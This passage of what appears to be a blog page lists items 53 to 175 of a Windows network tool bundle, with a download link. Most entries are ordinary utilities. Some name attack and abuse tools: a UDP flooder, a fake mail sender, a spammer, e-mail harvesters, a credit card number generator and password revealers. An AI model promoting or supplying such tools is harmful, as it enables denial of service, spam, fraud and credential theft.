53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)
Download
Here
Langganan:
Postingan (Atom)